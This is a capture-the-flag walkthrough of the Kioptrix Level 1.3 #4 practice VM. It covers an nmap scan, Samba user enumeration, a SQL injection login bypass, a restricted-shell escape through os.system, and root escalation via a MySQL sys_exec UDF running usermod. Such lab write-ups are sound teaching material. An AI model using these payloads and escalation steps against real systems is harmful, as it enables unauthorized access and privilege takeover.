VulnHub - Kioptrix Level 1.3 #4

Lets continue the Kioptrix series with Kioptrix Level 1.3 #4

## Objective

The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.

The Kioptrix Level 1.3 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to be compatible with virtualbox.

## The Hack

The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.

nmap -vv --reason -sV -sC -Pn --min-rate=400 -T4 --script-timeout 10m -p-
Nmap scan report for
Host is up, received user-set (0.0011s latency).
Scanned at 2018-02-28 09:59:17 SAST for 47s
Not shown: 39528 closed ports, 26003 filtered ports
Reason: 39528 conn-refused and 26003 no-responses
22/tcp  open  ssh         syn-ack OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAJQxDWMK4xxdEEdMA0YQLblzXV5xx6slDUANQmyouzmobMxTcImV1OfY9vB2LUjJwSbtuPn/Ef7LCik29SLab6FD59QsJKz3tOfX1UZJ9FeoxPhoVsfk+LDM4FbQxo0pPYhlQadVHAicjUnONl5WaaUEYuelAoU36v2wOKKDe+kRAAAAFQDAmqYNY1Ou7o5qEfZx0e9+XNUJ2QAAAIAt6puNENxfFnl74pmuKgeQaZQCsPnZlSyTODcP961mwFvTMHWD4pQsg0j6GlPUZrXUCmeTcNqbUQQHei6l8U1zMO4xFYxVz2kkGhbQAa/FGd1r3TqKXu+jQxTmp7xvNBVHoT3rKPqcd12qtweTjlYKlcHgW5XL3mR1Nw91JrhMlAAAAIAWHQLIOjwyAFvUhjGqEVK1Y0QoCoNLGEFd+wcrMLjpZEz7/Ay9IhyuBuRbeR/TxjitcUX6CC58cF5KoyhyQytFH17ZMpegb9x29mQiAg4wK1MGOi9D8OU1cW/COd/E8LvrNLxMFllatLVscw/WXXTi8fFmOEzkGsaRKC6NiQhDlg==
|   2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApA/UX2iq4JYXncTEDfBoyJWguuDkWDvyw4HlLyc1UBT3Pn2wnYLYa0MjwkBtPilmf5X1zK1z3su7oBEcSEt6o7RzDEUbC1O6nRvY4oSKwBD0qLaIHM1V5CZ+YDtLneY6IriJjHJ0DgNyXalPbQ36VZgu20o9dH8ItDkjlZTxRHPE6RnPiD1aZSLo452LNU3N+/2M/ny7QMvIyPNkcojeZQWS7RRSDa2lEUw1X1ECL6zCMiWC0lhciZf5ieum9MnATTF3dgk4BnCq6dfdEvae0avSypMcs6no2CJ2j9PPoAQ1VWj/WlAZzEbfna9YQ2cx8sW/W/9GfKA5SuLFt1u0iQ==
80/tcp  open  http        syn-ack Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn syn-ack Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m06s, deviation: 0s, median: 2h00m06s
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KIOPTRIX4<00>        Flags: <unique><active>
|   KIOPTRIX4<03>        Flags: <unique><active>
|   KIOPTRIX4<20>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
| Statistics:
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 6470/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 17257/tcp): CLEAN (Timeout)
|   Check 3 (port 25827/udp): CLEAN (Failed to receive data)
|   Check 4 (port 39441/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-02-28T04:59:56-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at .
# Nmap done at Wed Feb 28 10:00:04 2018 -- 1 IP address (1 host up) scanned in 46.89 seconds

A couple of ports open this time. 22 (ssh), 80(http), 139/445(smb).

We havn’t had smb yet, so let’s start with that.

The tool that we would be using to enumerate samba is enum4linux.

It will attempt to get the workgroup, see if there are shares that are being advertised, look for users and various other things.

I am not going to paste the output here because the output was 700 lines long.. I’m only going to show 3 lines that I found interesting and that we might be able to use later on.

S-1-22-1-1000 Unix User\loneferret (Local User)

S-1-22-1-1001 Unix User\john (Local User)

S-1-22-1-1002 Unix User\robert (Local User)

Samba gave us 3 Unix users on this target host. Other than that, there wasn’t anything else useful. Let’s move on onto the website.

Browsing to the server, the page lands on a login form. Thanks to the enum4linux scan we have a couple of usernames. Let’s attempt to login as those users using a sqli.

username: robert
password: 1' or 1=1 -- -

… and the sqli works. We are given a “Member’s Control Panel” which displays their username and a password. Nothing else is given. Take note of the password.

Try the second user.

username: john
password: 1' or 1=1 -- -

Same results as with the previous user. We got a password.

Onto the third user.

username: loneferret
password: 1' or 1=1 -- -

Not so lucky with this one. But that is okay.

We now have two usernames and passwords, and since the enum4linux scan told us these are unix users, why dont we try to ssh into the server as these users.

apb@stratios:~$ ssh john@
john@'s password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands

john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls

So we are only allowed to run the above commands. After attempting to run other commands or accessing restricted locations twice, the shell disconnects your session.

john:~$ cd /etc
*** forbidden path -> "/etc/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

john:~$ cd /
*** forbidden path -> "/"
*** Kicked out
Connection to closed.

We seem to be in some kind of restricted shell. Now there are various ways to get out of different kinds of restricted shells. Unfortunately we are not able to snoop around to see which one we are caught in so we will have to run a couple of commands to see if we can break out. The following one was successful.

john:~$ echo os.system('/bin/bash')

And we are out of the restricted shell! Now we can snoop around and see how we can do a privilege escalation.

Just a note on the restricted shell. That line I ran to break out seems very python-ish(os.system). That is because the restricted shell that was used was lshell. It is a shell written in python and they used a vulnerable version of it.

Anyway let’s see if we can get root.

First do we have sudo privilege?

john@Kioptrix4:~$ sudo -l
[sudo] password for john:
Sorry, user john may not run sudo on Kioptrix4.

Guess not.

Let’s list all proccesses being run on the server. Maybe there is something we can exploit.

Seems like only apache and mysql is running… and mysql is being run as root.. keep that in mind..

Since the php website connects to the mysql backend, let’s go see if there are credentials in a file in the apache document root. How I came to this course of action is that your popular cms’; wordpress, joomla etc; store database credentials in clear text in a config file where ever it has been installed.

john@Kioptrix4:/var/www/john$ ls
john@Kioptrix4:/var/www/john$ vim john.php

$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password

Logging into the database as root with no password.. wow..

john@Kioptrix4:~$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 65
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
| Database           |
| information_schema |
| members            |
| mysql              |
3 rows in set (0.00 sec)

After snooping around there doesn’t seem to be any more useful information we can use inside the database.

Let’s recap what we know. We have root access to a mysql database whose process is being run by root.. hmmm there is something we can manipulate here.

In mysql is something called UDF (user defined function). It allowes you to run external commands from within mysql. So maybe we can use this to give john extra privileges.

Let’s add the user john to the admin group which will allow him to run sudo.

From the mysql console.

mysql> select sys_exec('usermod -a -G admin john');
| sys_exec('usermod -a -G admin john') |
| NULL                                 |
1 row in set (0.06 sec)

Quit and lets test.

john@Kioptrix4:~$ sudo su -
[sudo] password for john:

There we go. Didn’t even have to run a exploit to do a privilege escalation. Just exploited very bad configurations.

Moral of the story. NEVER run services as root because something like this can happen. Stop being a lazy admin and taking the easy way instead of the right way.